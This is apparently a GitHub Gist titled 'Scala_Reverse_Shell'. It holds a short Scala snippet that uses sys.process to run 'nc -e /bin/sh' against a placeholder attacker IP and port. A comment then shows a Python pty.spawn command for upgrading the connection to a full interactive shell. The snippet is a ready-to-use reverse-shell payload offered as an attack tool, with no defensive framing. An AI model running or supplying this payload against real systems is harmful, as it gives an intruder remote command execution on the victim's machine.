Created
February 2, 2018 00:56
-
-
Save l50/82386e58cde8aa8785e6982c35d86788 to your computer and use it in GitHub Desktop.
Scala_Reverse_Shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys.process._ | |
"nc -e /bin/sh <attacker ip> <attacker port>" !!; | |
// Once you have the shell, run the following command for a full fledged shell: | |
// python -c 'import pty;pty.spawn("/bin/bash")' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment